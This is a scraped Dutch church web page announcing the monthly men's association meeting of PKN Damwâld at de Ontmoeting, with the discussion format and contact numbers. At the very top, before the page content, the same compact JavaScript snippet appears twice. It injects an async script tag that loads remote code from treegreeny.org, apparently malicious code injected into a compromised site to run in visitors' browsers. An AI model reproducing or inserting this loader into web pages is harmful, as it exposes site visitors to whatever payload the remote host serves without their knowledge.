;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mannenvereniging - PKN Damwâld
1 december 2016
15:30 t/m 17:15
de Ontmoeting
Mannenvereniging

Misschien is uw eerste gedachte bij het lezen van bovenstaand opschrift: ‘Mannenvereniging, bestaat die nog bij onze kerk?”
Het antwoord is heel eenvoudig, ja die bestaat nog !
Nu u dit weet bent u natuurlijk ook benieuwd naar het hoe en wat van deze mannenvereniging. In principe wordt de mannenvereniging één keer per maand gehouden, en wel op de eerste donderdag van elke maand; De vergadertijd is van 15.30 uur tot plm. 17.15 uur.
De bijeenkomsten zijn in een lokaal van de Ontmoeting
Tijdens de vergadering wordt er gesproken over een onderwerp dat te maken heeft met ons geloof en/of met de kerk. De ene keer wordt bijvoorbeeld een preek besproken (dit hoeft niet persé een preek te zijn van onze eigen predikant) de andere keer wordt een artikel uit een (dag-)blad dat direct of indirect betrekking heeft op geloofs- of kerkelijke aangelegenheden aan de orde gesteld. De leden dragen zelf de te bespreken onderwerpen aan. De informatie over het te bespreken onderwerp krijgen de leden vroegtijdig. Tijdens de vergaderingen is er ruim voldoende gelegenheid tot gesprek.
U bent van harte welkom op de eerstvolgende vergadering.
Als u vooraf meer informatie wilt kunt u contact opnemen met U. v.d. Schaaf (tel 421950) of met W. Rozendal (tel 423712).

Locatie: de OntmoetingFoarwei 38, 9104 BX Damwâld